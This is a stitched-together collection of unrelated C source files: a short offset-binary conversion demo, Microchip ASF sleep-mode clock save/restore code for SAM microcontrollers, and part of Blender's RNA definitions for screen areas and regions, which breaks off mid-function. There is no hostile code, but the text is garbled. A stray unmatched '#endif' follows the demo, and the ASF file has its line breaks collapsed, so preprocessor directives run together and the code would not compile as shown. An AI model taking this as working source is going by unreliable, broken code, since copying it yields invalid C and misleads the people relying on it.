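#include <stdio.h>
#include <stdint.h>

static uint16_t to_offset_binary(int16_t sample)
{
  /* -32768 -> 0x0000, 0 -> 0x8000, 32767 -> 0xffff */
  return (uint16_t)((uint16_t)sample + 0x8000u);
}

int main(void)
{
  printf("%04x %04x %04x\n",
         (unsigned)to_offset_binary(-32768),
         (unsigned)to_offset_binary(0),
         (unsigned)to_offset_binary(32767));
  /* Prints: 0000 8000 ffff */
  return 0;
}
#endif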
979087.c
/**
 * \file
 *
 * \brief Sleep mode access
 *
 * Copyright (c) 2012-2018 Microchip Technology Inc. and its subsidiaries.
 *
 * \asf_license_start
 *
 * \page License
 *
 * Subject to your compliance with these terms, you may use Microchip
 * software and any derivatives exclusively with Microchip products.
 * It is your responsibility to comply with third party license terms applicable
 * to your use of third party software (including open source software) that
 * may accompany Microchip software.
 *
 * THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES,
 * WHETHER EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE,
 * INCLUDING ANY IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY,
 * AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT WILL MICROCHIP BE
 * LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE, INCIDENTAL OR CONSEQUENTIAL
 * LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND WHATSOEVER RELATED TO THE
 * SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS BEEN ADVISED OF THE
 * POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE FULLEST EXTENT
 * ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN ANY WAY
 * RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
 * THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
 *
 * \asf_license_stop
 *
 */
/*
 * Support and FAQ: visit <a href="https://www.microchip.com/support/">Microchip Support</a>
 */
#include <compiler.h>
#include "sleep.h"

/* SAM3,SAM4,SAMG,SAMV,SAMS and SAME series */
#if (SAM3S || SAM3N || SAM3XA || SAM3U || SAM4S || SAM4E || SAM4N || SAM4C || \
		SAM4CM || SAMG || SAM4CP || SAMV71 || SAMV70 || SAMS70 || SAME70)
# include "pmc.h"
# include "board.h"

/* Checking board configuration of main clock xtal startup time */
#if !defined(BOARD_OSC_STARTUP_US)
# warning The board main clock xtal startup time has not been defined. Using default settings.
# define BOARD_OSC_STARTUP_US (15625UL) #endif #if !defined(EFC0) # define EFC0 EFC #endif /** * Save clock settings and shutdown PLLs */ __always_inline static void pmc_save_clock_settings( uint32_t *p_osc_setting, uint32_t *p_pll0_setting, uint32_t *p_pll1_setting, uint32_t *p_mck_setting, uint32_t *p_fmr_setting, #if defined(EFC1) uint32_t *p_fmr_setting1, #endif const bool disable_xtal) { uint32_t mor = PMC->CKGR_MOR; uint32_t mckr = PMC->PMC_MCKR; uint32_t fmr = EFC0->EEFC_FMR; # if defined(EFC1) uint32_t fmr1 = EFC1->EEFC_FMR; # endif if (p_osc_setting) { *p_osc_setting = mor; } if (p_pll0_setting) { *p_pll0_setting = PMC->CKGR_PLLAR; } if (p_pll1_setting) { #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) *p_pll1_setting = PMC->CKGR_PLLBR; #elif (SAM3U || SAM3XA) *p_pll1_setting = PMC->CKGR_UCKR; #else *p_pll1_setting = 0; #endif } if (p_mck_setting) { *p_mck_setting = mckr; } if (p_fmr_setting) { *p_fmr_setting = fmr; } #if defined(EFC1) if (p_fmr_setting1) { *p_fmr_setting1 = fmr1; } #endif /* Enable FAST RC */ PMC->CKGR_MOR = CKGR_MOR_KEY_PASSWD | mor | CKGR_MOR_MOSCRCEN; /* if MCK source is PLL, switch to mainck */ if ((mckr & PMC_MCKR_CSS_Msk) > PMC_MCKR_CSS_MAIN_CLK) { /* MCK -> MAINCK */ mckr = (mckr & (~PMC_MCKR_CSS_Msk)) | PMC_MCKR_CSS_MAIN_CLK; PMC->PMC_MCKR = mckr; while(!(PMC->PMC_SR & PMC_SR_MCKRDY)); } /* MCK prescale -> 1 */ if (mckr & PMC_MCKR_PRES_Msk) { mckr = (mckr & (~PMC_MCKR_PRES_Msk)); PMC->PMC_MCKR = mckr; while(!(PMC->PMC_SR & PMC_SR_MCKRDY)); } /* Disable PLLs */ pmc_disable_pllack(); #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) pmc_disable_pllbck(); #elif (SAM3U || SAM3XA) pmc_disable_upll_clock(); #endif /* Prepare for entering WAIT mode */ /* Wait fast RC ready */ while (!(PMC->PMC_SR & PMC_SR_MOSCRCS)); /* Switch mainck to FAST RC */ #if SAMG /** * For the sleepwalking feature, we need an accurate RC clock. Only 24M and * 16M are trimmed in production. Here we select the 24M. * And so wait state need to be 1. 
*/ EFC0->EEFC_FMR = (fmr & (~EEFC_FMR_FWS_Msk)) | EEFC_FMR_FWS(1); PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCSEL) | CKGR_MOR_MOSCRCF_24_MHz | CKGR_MOR_KEY_PASSWD; #else PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCSEL) | CKGR_MOR_KEY_PASSWD; #endif while (!(PMC->PMC_SR & PMC_SR_MOSCSELS)); #if (!SAMG) /* FWS update */ EFC0->EEFC_FMR = fmr & (~EEFC_FMR_FWS_Msk); #if defined(EFC1) EFC1->EEFC_FMR = fmr1 & (~EEFC_FMR_FWS_Msk); #endif #endif /* Disable XTALs */ if (disable_xtal) { PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCXTEN) | CKGR_MOR_KEY_PASSWD; } } /** * Restore clock settings */ __always_inline static void pmc_restore_clock_setting( const uint32_t osc_setting, const uint32_t pll0_setting, const uint32_t pll1_setting, const uint32_t mck_setting, const uint32_t fmr_setting #if defined(EFC1) , const uint32_t fmr_setting1 #endif ) { uint32_t mckr; uint32_t pll_sr = 0; /* Switch mainck to external xtal */ if (CKGR_MOR_MOSCXTBY == (osc_setting & CKGR_MOR_MOSCXTBY)) { /* Bypass mode */ PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCXTEN) | CKGR_MOR_KEY_PASSWD | CKGR_MOR_MOSCXTBY | CKGR_MOR_MOSCSEL; PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCRCEN & ~CKGR_MOR_MOSCRCF_Msk) | CKGR_MOR_KEY_PASSWD; } else if (CKGR_MOR_MOSCXTEN == (osc_setting & CKGR_MOR_MOSCXTEN)) { /* Enable External XTAL */ if (!(PMC->CKGR_MOR & CKGR_MOR_MOSCXTEN)) { PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCXTBY) | CKGR_MOR_KEY_PASSWD | CKGR_MOR_MOSCXTEN; /* Wait the Xtal to stabilize */ while (!(PMC->PMC_SR & PMC_SR_MOSCXTS)); } /* Select External XTAL */ if (!(PMC->CKGR_MOR & CKGR_MOR_MOSCSEL)) { PMC->CKGR_MOR |= CKGR_MOR_KEY_PASSWD | CKGR_MOR_MOSCSEL; while (!(PMC->PMC_SR & PMC_SR_MOSCSELS)); } /* Disable Fast RC */ PMC->CKGR_MOR = (PMC->CKGR_MOR & ~CKGR_MOR_MOSCRCEN & ~CKGR_MOR_MOSCRCF_Msk) | CKGR_MOR_KEY_PASSWD; } if (pll0_setting & CKGR_PLLAR_MULA_Msk) { #if (SAM4C || SAM4CM || SAMG || SAM4CP) PMC->CKGR_PLLAR = pll0_setting; #else PMC->CKGR_PLLAR = CKGR_PLLAR_ONE | pll0_setting; #endif pll_sr |= PMC_SR_LOCKA; } #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) if (pll1_setting & CKGR_PLLBR_MULB_Msk) { PMC->CKGR_PLLBR = pll1_setting; pll_sr |= PMC_SR_LOCKB; } #elif (SAM3U || SAM3XA) if (pll1_setting & CKGR_UCKR_UPLLEN) { PMC->CKGR_UCKR = pll1_setting; pll_sr |= PMC_SR_LOCKU; } #else UNUSED(pll1_setting); #endif /* Wait MCK source ready */ switch(mck_setting & PMC_MCKR_CSS_Msk) { case PMC_MCKR_CSS_PLLA_CLK: while (!(PMC->PMC_SR & PMC_SR_LOCKA)); break; #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) case PMC_MCKR_CSS_PLLB_CLK: while (!(PMC->PMC_SR & PMC_SR_LOCKB)); break; #elif (SAM3U || SAM3XA) case PMC_MCKR_CSS_UPLL_CLK: while (!(PMC->PMC_SR & PMC_SR_LOCKU)); break; #endif } /* Switch to faster clock */ mckr = PMC->PMC_MCKR; /* Set PRES */ PMC->PMC_MCKR = (mckr & ~PMC_MCKR_PRES_Msk) | (mck_setting & PMC_MCKR_PRES_Msk); while (!(PMC->PMC_SR & PMC_SR_MCKRDY)); /* Restore flash wait states */ EFC0->EEFC_FMR = fmr_setting; #if defined(EFC1) EFC1->EEFC_FMR = fmr_setting1; #endif /* Set CSS and others */ PMC->PMC_MCKR = mck_setting; while (!(PMC->PMC_SR & PMC_SR_MCKRDY)); /* Waiting all restored PLLs ready */ while (!(PMC->PMC_SR & pll_sr)); } /** If clocks are switched for some sleep mode */ static volatile bool b_is_sleep_clock_used = false; /** Callback invoked once when clocks are restored */ static pmc_callback_wakeup_clocks_restored_t callback_clocks_restored = NULL; void pmc_sleep(int sleep_mode) { switch (sleep_mode) { case SAM_PM_SMODE_SLEEP_WFI: case SAM_PM_SMODE_SLEEP_WFE: #if (SAM4S || SAM4E || 
SAM4N || SAM4C || SAM4CM || SAM4CP || SAMG || SAMV71 || SAMV70 || SAMS70 || SAME70) SCB->SCR &= (uint32_t)~SCR_SLEEPDEEP; cpu_irq_enable(); __DSB(); __WFI(); break; #else PMC->PMC_FSMR &= (uint32_t)~PMC_FSMR_LPM; SCB->SCR &= (uint32_t)~SCR_SLEEPDEEP; cpu_irq_enable(); if (sleep_mode == SAM_PM_SMODE_SLEEP_WFI) { __DSB(); __WFI(); } else { __DSB(); __WFE(); } break; #endif case SAM_PM_SMODE_WAIT_FAST: case SAM_PM_SMODE_WAIT: { uint32_t mor, pllr0, pllr1, mckr; uint32_t fmr; #if defined(EFC1) uint32_t fmr1; #endif #if (SAM4S || SAM4E || SAM4N || SAM4C || SAM4CM || SAM4CP || SAMG || SAMV71 || SAMV70 || SAMS70 || SAME70) (sleep_mode == SAM_PM_SMODE_WAIT_FAST) ? pmc_set_flash_in_wait_mode(PMC_FSMR_FLPM_FLASH_STANDBY) : pmc_set_flash_in_wait_mode(PMC_FSMR_FLPM_FLASH_DEEP_POWERDOWN); #endif cpu_irq_disable(); b_is_sleep_clock_used = true; #if (SAM4C || SAM4CM || SAM4CP) /* Backup the sub-system 1 status and stop sub-system 1 */ uint32_t cpclk_backup = PMC->PMC_SCSR & (PMC_SCSR_CPCK | PMC_SCSR_CPBMCK); PMC->PMC_SCDR = cpclk_backup | PMC_SCDR_CPKEY_PASSWD; #endif pmc_save_clock_settings(&mor, &pllr0, &pllr1, &mckr, &fmr, #if defined(EFC1) &fmr1, #endif (sleep_mode == SAM_PM_SMODE_WAIT)); /* Enter wait mode */ cpu_irq_enable(); pmc_enable_waitmode(); cpu_irq_disable(); pmc_restore_clock_setting(mor, pllr0, pllr1, mckr, fmr #if defined(EFC1) , fmr1 #endif ); #if (SAM4C || SAM4CM || SAM4CP) /* Restore the sub-system 1 */ PMC->PMC_SCER = cpclk_backup | PMC_SCER_CPKEY_PASSWD; #endif b_is_sleep_clock_used = false; if (callback_clocks_restored) { callback_clocks_restored(); callback_clocks_restored = NULL; } cpu_irq_enable(); break; } #if (!(SAMG51 || SAMG53 || SAMG54)) case SAM_PM_SMODE_BACKUP: SCB->SCR |= SCR_SLEEPDEEP; #if (SAM4S || SAM4E || SAM4N || SAM4C || SAM4CM || SAM4CP || SAMG55 || SAMV71 || SAMV70 || SAMS70 || SAME70) SUPC->SUPC_CR = SUPC_CR_KEY_PASSWD | SUPC_CR_VROFF_STOP_VREG; cpu_irq_enable(); __WFI() ; #else cpu_irq_enable(); __WFE() ; #endif break; #endif } } bool pmc_is_wakeup_clocks_restored(void) { return !b_is_sleep_clock_used; } void pmc_wait_wakeup_clocks_restore( pmc_callback_wakeup_clocks_restored_t callback) { if (b_is_sleep_clock_used) { cpu_irq_disable(); callback_clocks_restored = callback; } else if (callback) { callback(); } } #endif
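/*
 * Editor's note: a minimal usage sketch (not part of ASF; the handler and
 * helper names are hypothetical). pmc_sleep(SAM_PM_SMODE_WAIT) saves the
 * clock tree, runs from the fast RC while waiting, and restores the PLL
 * settings afterwards. A wakeup interrupt can fire while the clocks are
 * still switched, so clock-sensitive work should be deferred through
 * pmc_wait_wakeup_clocks_restore(), which runs the callback immediately
 * if the clocks are already back.
 */
#if 0   /* illustration only -- assumes the ASF headers used above */
#include "sleep.h"

static void uart_resume(void)
{
	/* Reprogram baud-rate generators etc. now that MCK/PLL are restored. */
}

static void wakeup_pin_handler(uint32_t id, uint32_t mask)
{
	/* May run from an interrupt while pmc_sleep() is still unwinding. */
	pmc_wait_wakeup_clocks_restore(uart_resume);
}

static void enter_low_power(void)
{
	pmc_sleep(SAM_PM_SMODE_WAIT);   /* returns after wakeup + clock restore */
}
#endif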
142768.c
/* * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /** \file * \ingroup RNA */ #include <stdlib.h> #include <stddef.h> #include "RNA_define.h" #include "RNA_enum_types.h" #include "rna_internal.h" #include "DNA_screen_types.h" #include "DNA_scene_types.h" #include "DNA_workspace_types.h" const EnumPropertyItem rna_enum_region_type_items[] = { {RGN_TYPE_WINDOW, "WINDOW", 0, "Window", ""}, {RGN_TYPE_HEADER, "HEADER", 0, "Header", ""}, {RGN_TYPE_CHANNELS, "CHANNELS", 0, "Channels", ""}, {RGN_TYPE_TEMPORARY, "TEMPORARY", 0, "Temporary", ""}, {RGN_TYPE_UI, "UI", 0, "UI", ""}, {RGN_TYPE_TOOLS, "TOOLS", 0, "Tools", ""}, {RGN_TYPE_TOOL_PROPS, "TOOL_PROPS", 0, "Tool Properties", ""}, {RGN_TYPE_PREVIEW, "PREVIEW", 0, "Preview", ""}, {RGN_TYPE_HUD, "HUD", 0, "Floating Region", ""}, {RGN_TYPE_NAV_BAR, "NAVIGATION_BAR", 0, "Navigation Bar", ""}, {RGN_TYPE_EXECUTE, "EXECUTE", 0, "Execute Buttons", ""}, {RGN_TYPE_FOOTER, "FOOTER", 0, "Footer", ""}, {RGN_TYPE_TOOL_HEADER, "TOOL_HEADER", 0, "Tool Header", ""}, {0, NULL, 0, NULL, NULL}, }; #include "ED_screen.h" #include "WM_api.h" #include "WM_types.h" #ifdef RNA_RUNTIME # include "BKE_global.h" # include "BKE_workspace.h" # include "BKE_screen.h" # include "DEG_depsgraph.h" # include "UI_view2d.h" # ifdef WITH_PYTHON # include "BPY_extern.h" # endif static void rna_Screen_bar_update(Main *UNUSED(bmain), Scene *UNUSED(scene), PointerRNA *ptr) { bScreen *screen = (bScreen *)ptr->data; screen->do_draw = true; screen->do_refresh = true; } static void rna_Screen_redraw_update(Main *UNUSED(bmain), Scene *UNUSED(scene), PointerRNA *ptr) { bScreen *screen = (bScreen *)ptr->data; /* the settings for this are currently only available from a menu in the TimeLine, * hence refresh=SPACE_ACTION, as timeline is now in there */ ED_screen_animation_timer_update(screen, screen->redraws_flag, SPACE_ACTION); } static bool rna_Screen_is_animation_playing_get(PointerRNA *UNUSED(ptr)) { /* can be NULL on file load, T42619 */ wmWindowManager *wm = G_MAIN->wm.first; return wm ? (ED_screen_animation_playing(wm) != NULL) : 0; } static int rna_region_alignment_get(PointerRNA *ptr) { ARegion *region = ptr->data; return RGN_ALIGN_ENUM_FROM_MASK(region->alignment); } static bool rna_Screen_fullscreen_get(PointerRNA *ptr) { bScreen *sc = (bScreen *)ptr->data; return (sc->state == SCREENMAXIMIZED); } /* UI compatible list: should not be needed, but for now we need to keep EMPTY * at least in the static version of this enum for python scripts. 
*/ static const EnumPropertyItem *rna_Area_type_itemf(bContext *UNUSED(C), PointerRNA *UNUSED(ptr), PropertyRNA *UNUSED(prop), bool *r_free) { EnumPropertyItem *item = NULL; int totitem = 0; /* +1 to skip SPACE_EMPTY */ for (const EnumPropertyItem *item_from = rna_enum_space_type_items + 1; item_from->identifier; item_from++) { if (ELEM(item_from->value, SPACE_TOPBAR, SPACE_STATUSBAR)) { continue; } RNA_enum_item_add(&item, &totitem, item_from); } RNA_enum_item_end(&item, &totitem); *r_free = true; return item; } static int rna_Area_type_get(PointerRNA *ptr) { ScrArea *sa = (ScrArea *)ptr->data; /* Usually 'spacetype' is used. It lags behind a bit while switching area * type though, then we use 'butspacetype' instead (T41435). */ return (sa->butspacetype == SPACE_EMPTY) ? sa->spacetype : sa->butspacetype; } static void rna_Area_type_set(PointerRNA *ptr, int value) { if (ELEM(value, SPACE_TOPBAR, SPACE_STATUSBAR)) { /* Special case: An area can not be set to show the top-bar editor (or * other global areas). However it should still be possible to identify * its type from Python. */ return; } ScrArea *sa = (ScrArea *)ptr->data; sa->butspacetype = value; } static void rna_Area_type_update(bContext *C, PointerRNA *ptr) { bScreen *sc = (bScreen *)ptr->id.data; ScrArea *sa = (ScrArea *)ptr->data; /* Running update without having called 'set', see: T64049 */ if (sa->butspacetype == SPACE_EMPTY) { return; } wmWindowManager *wm = CTX_wm_manager(C); wmWindow *win; /* XXX this call still use context, so we trick it to work in the right context */ for (win = wm->windows.first; win; win = win->next) { if (sc == WM_window_get_active_screen(win)) { wmWindow *prevwin = CTX_wm_window(C); ScrArea *prevsa = CTX_wm_area(C); ARegion *prevar = CTX_wm_region(C); CTX_wm_window_set(C, win); CTX_wm_area_set(C, sa); CTX_wm_region_set(C, NULL); ED_area_newspace(C, sa, sa->butspacetype, true); ED_area_tag_redraw(sa); /* Unset so that rna_Area_type_get uses spacetype instead. */ sa->butspacetype = SPACE_EMPTY; /* It is possible that new layers becomes visible. */ if (sa->spacetype == SPACE_VIEW3D) { DEG_on_visible_update(CTX_data_main(C), false); } CTX_wm_window_set(C, prevwin); CTX_wm_area_set(C, prevsa); CTX_wm_region_set(C, prevar); break; } } } static const EnumPropertyItem *rna_Area_ui_type_itemf(bContext *C, PointerRNA *UNUSED(ptr), PropertyRNA *UNUSED(prop), bool *r_free) { EnumPropertyItem *item = NULL; int totitem = 0; /* +1 to skip SPACE_EMPTY */ for (const EnumPropertyItem *item_from = rna_enum_space_type_items + 1; item_from->identifier; item_from++) { if (ELEM(item_from->value, SPACE_TOPBAR, SPACE_STATUSBAR)) { continue; } SpaceType *st = item_from->identifier[0] ? BKE_spacetype_from_id(item_from->value) : NULL; int totitem_prev = totitem; if (st && st->space_subtype_item_extend != NULL) { st->space_subtype_item_extend(C, &item, &totitem); while (totitem_prev < totitem) { item[totitem_prev++].value |= item_from->value << 16; } } else { RNA_enum_item_add(&item, &totitem, item_from); item[totitem_prev++].value = item_from->value << 16; } } RNA_enum_item_end(&item, &totitem); *r_free = true; return item; } static int rna_Area_ui_type_get(PointerRNA *ptr) { ScrArea *sa = ptr->data; const int area_type = rna_Area_type_get(ptr); const bool area_changing = sa->butspacetype != SPACE_EMPTY; int value = area_type << 16; /* sa->type can be NULL (when not yet initialized), try to do it now. 
*/ /* Copied from `ED_area_initialize()`.*/ if (sa->type == NULL || area_changing) { sa->type = BKE_spacetype_from_id(area_type); if (sa->type == NULL) { sa->spacetype = SPACE_VIEW3D; sa->type = BKE_spacetype_from_id(sa->spacetype); } BLI_assert(sa->type != NULL); } if (sa->type->space_subtype_item_extend != NULL) { value |= area_changing ? sa->butspacetype_subtype : sa->type->space_subtype_get(sa); } return value; } static void rna_Area_ui_type_set(PointerRNA *ptr, int value) { ScrArea *sa = ptr->data; const int space_type = value >> 16; SpaceType *st = BKE_spacetype_from_id(space_type); rna_Area_type_set(ptr, space_type); if (st && st->space_subtype_item_extend != NULL) { sa->butspacetype_subtype = value & 0xffff; } } static void rna_Area_ui_type_update(bContext *C, PointerRNA *ptr) { ScrArea *sa = ptr->data; SpaceType *st = BKE_spacetype_from_id(sa->butspacetype); rna_Area_type_update(C, ptr); if ((sa->type == st) && (st->space_subtype_item_extend != NULL)) { st->space_subtype_set(sa, sa->butspacetype_subtype); } sa->butspacetype_subtype = 0; } static void rna_View2D_region_to_view(struct View2D *v2d, int x, int y, float result[2]) { UI_view2d_region_to_view(v2d, x, y, &result[0], &result[1]); } static void rna_View2D_view_to_region( struct View2D *v2d, float x, float y, bool clip, int result[2]) { if (clip) { UI_view2d_view_to_region_clip(v2d, x, y, &result[0], &result[1]); } else { UI_view2d_view_to_region(v2d, x, y, &result[0], &result[1]); } } #else /* Area.spaces */ static void rna_def_area_spaces(BlenderRNA *brna, PropertyRNA *cprop) { StructRNA *srna; PropertyRNA *prop; RNA_def_property_srna(cprop, "AreaSpaces"); srna = RNA_def_struct(brna, "AreaSpaces", NULL); RNA_def_struct_sdna(srna, "ScrArea"); RNA_def_struct_ui_text(srna, "Area Spaces", "Collection of spaces"); prop = RNA_def_property(srna, "active", PROP_POINTER, PROP_NONE); RNA_def_property_pointer_sdna(prop, NULL, "spacedata.first"); RNA_def_property_struct_type(prop, "Space"); RNA_def_property_ui_text(prop, "Active Space", "Space currently being displayed in this area"); } static void rna_def_area_api(StructRNA *srna) { FunctionRNA *func; PropertyRNA *parm; RNA_def_function(srna, "tag_redraw", "ED_area_tag_redraw"); func = RNA_def_function(srna, "header_text_set", "ED_area_status_text"); RNA_def_function_ui_description(func, "Set the header status text"); parm = RNA_def_string( func, "text", NULL, 0, "Text", "New string for the header, None clears the text"); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); RNA_def_property_clear_flag(parm, PROP_NEVER_NULL); } static void rna_def_area(BlenderRNA *brna) { StructRNA *srna; PropertyRNA *prop; srna = RNA_def_struct(brna, "Area", NULL); RNA_def_struct_ui_text(srna, "Area", "Area in a subdivided screen, containing an editor"); RNA_def_struct_sdna(srna, "ScrArea"); prop = RNA_def_property(srna, "spaces", PROP_COLLECTION, PROP_NONE); RNA_def_property_collection_sdna(prop, NULL, "spacedata", NULL); RNA_def_property_struct_type(prop, "Space"); RNA_def_property_ui_text(prop, "Spaces", "Spaces contained in this area, the first being the active space " "(NOTE: Useful for example to restore a previously used 3D view space " "in a certain area to get the old view orientation)"); rna_def_area_spaces(brna, prop); prop = RNA_def_property(srna, "regions", PROP_COLLECTION, PROP_NONE); RNA_def_property_collection_sdna(prop, NULL, "regionbase", NULL); RNA_def_property_struct_type(prop, "Region"); RNA_def_property_ui_text(prop, "Regions", "Regions this area is subdivided in"); prop = 
RNA_def_property(srna, "show_menus", PROP_BOOLEAN, PROP_NONE); RNA_def_property_boolean_negative_sdna(prop, NULL, "flag", HEADER_NO_PULLDOWN); RNA_def_property_ui_text(prop, "Show Menus", "Show menus in the header"); prop = RNA_def_property(srna, "type", PROP_ENUM, PROP_NONE); RNA_def_property_enum_sdna(prop, NULL, "spacetype"); RNA_def_property_enum_items(prop, rna_enum_space_type_items); RNA_def_property_enum_default(prop, SPACE_VIEW3D); RNA_def_property_enum_funcs( prop, "rna_Area_type_get", "rna_Area_type_set", "rna_Area_type_itemf"); RNA_def_property_ui_text(prop, "Editor Type", "Current editor type for this area"); RNA_def_property_flag(prop, PROP_CONTEXT_UPDATE); RNA_def_property_clear_flag(prop, PROP_ANIMATABLE); RNA_def_property_update(prop, 0, "rna_Area_type_update"); prop = RNA_def_property(srna, "ui_type", PROP_ENUM, PROP_NONE); RNA_def_property_enum_items(prop, DummyRNA_NULL_items); /* infact dummy */ RNA_def_property_enum_default(prop, SPACE_VIEW3D << 16); RNA_def_property_enum_funcs( prop, "rna_Area_ui_type_get", "rna_Area_ui_type_set", "rna_Area_ui_type_itemf"); RNA_def_property_ui_text(prop, "Editor Type", "Current editor type for this area"); RNA_def_property_flag(prop, PROP_CONTEXT_UPDATE); RNA_def_property_clear_flag(prop, PROP_ANIMATABLE); RNA_def_property_update(prop, 0, "rna_Area_ui_type_update"); prop = RNA_def_property(srna, "x", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "totrct.xmin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "X Position", "The window relative vertical location of the area"); prop = RNA_def_property(srna, "y", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "totrct.ymin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "Y Position", "The window relative horizontal location of the area"); prop = RNA_def_property(srna, "width", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winx"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Width", "Area width"); prop = RNA_def_property(srna, "height", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winy"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Height", "Area height"); rna_def_area_api(srna); } static void rna_def_view2d_api(StructRNA *srna) { FunctionRNA *func; PropertyRNA *parm; static const float view_default[2] = {0.0f, 0.0f}; static const int region_default[2] = {0.0f, 0.0f}; func = RNA_def_function(srna, "region_to_view", "rna_View2D_region_to_view"); RNA_def_function_ui_description(func, "Transform region coordinates to 2D view"); parm = RNA_def_int(func, "x", 0, INT_MIN, INT_MAX, "x", "Region x coordinate", -10000, 10000); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); parm = RNA_def_int(func, "y", 0, INT_MIN, INT_MAX, "y", "Region y coordinate", -10000, 10000); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); parm = RNA_def_float_array(func, "result", 2, view_default, -FLT_MAX, FLT_MAX, "Result", "View coordinates", -10000.0f, 10000.0f); RNA_def_parameter_flags(parm, PROP_THICK_WRAP, 0); RNA_def_function_output(func, parm); func = RNA_def_function(srna, "view_to_region", "rna_View2D_view_to_region"); RNA_def_function_ui_description(func, "Transform 2D view coordinates to region"); parm = RNA_def_float( func, "x", 0.0f, -FLT_MAX, FLT_MAX, "x", "2D View x coordinate", -10000.0f, 10000.0f); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); parm = RNA_def_float( func, "y", 0.0f, -FLT_MAX, 
FLT_MAX, "y", "2D View y coordinate", -10000.0f, 10000.0f); RNA_def_parameter_flags(parm, 0, PARM_REQUIRED); RNA_def_boolean(func, "clip", 1, "Clip", "Clip coordinates to the visible region"); parm = RNA_def_int_array(func, "result", 2, region_default, INT_MIN, INT_MAX, "Result", "Region coordinates", -10000, 10000); RNA_def_parameter_flags(parm, PROP_THICK_WRAP, 0); RNA_def_function_output(func, parm); } static void rna_def_view2d(BlenderRNA *brna) { StructRNA *srna; /* PropertyRNA *prop; */ srna = RNA_def_struct(brna, "View2D", NULL); RNA_def_struct_ui_text(srna, "View2D", "Scroll and zoom for a 2D region"); RNA_def_struct_sdna(srna, "View2D"); /* TODO more View2D properties could be exposed here (read-only) */ rna_def_view2d_api(srna); } static void rna_def_region(BlenderRNA *brna) { StructRNA *srna; PropertyRNA *prop; static const EnumPropertyItem alignment_types[] = { {RGN_ALIGN_NONE, "NONE", 0, "None", "Don't use any fixed alignment, fill available space"}, {RGN_ALIGN_TOP, "TOP", 0, "Top", ""}, {RGN_ALIGN_BOTTOM, "BOTTOM", 0, "Bottom", ""}, {RGN_ALIGN_LEFT, "LEFT", 0, "Left", ""}, {RGN_ALIGN_RIGHT, "RIGHT", 0, "Right", ""}, {RGN_ALIGN_HSPLIT, "HORIZONTAL_SPLIT", 0, "Horizontal Split", ""}, {RGN_ALIGN_VSPLIT, "VERTICAL_SPLIT", 0, "Vertical Split", ""}, {RGN_ALIGN_FLOAT, "FLOAT", 0, "Float", "Region floats on screen, doesn't use any fixed alignment"}, {RGN_ALIGN_QSPLIT, "QUAD_SPLIT", 0, "Quad Split", "Region is split horizontally and vertically"}, {0, NULL, 0, NULL, NULL}, }; srna = RNA_def_struct(brna, "Region", NULL); RNA_def_struct_ui_text(srna, "Region", "Region in a subdivided screen area"); RNA_def_struct_sdna(srna, "ARegion"); prop = RNA_def_property(srna, "type", PROP_ENUM, PROP_NONE); RNA_def_property_enum_sdna(prop, NULL, "regiontype"); RNA_def_property_enum_items(prop, rna_enum_region_type_items); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text(prop, "Region Type", "Type of this region"); prop = RNA_def_property(srna, "x", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "winrct.xmin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "X Position", "The window relative vertical location of the region"); prop = RNA_def_property(srna, "y", PROP_INT, PROP_NONE); RNA_def_property_int_sdna(prop, NULL, "winrct.ymin"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); RNA_def_property_ui_text( prop, "Y Position", "The window relative horizontal location of the region"); prop = RNA_def_property(srna, "width", PROP_INT, PROP_UNSIGNED); RNA_def_property_int_sdna(prop, NULL, "winx"); RNA_def_property_clear_flag(prop, PROP_EDITABLE); 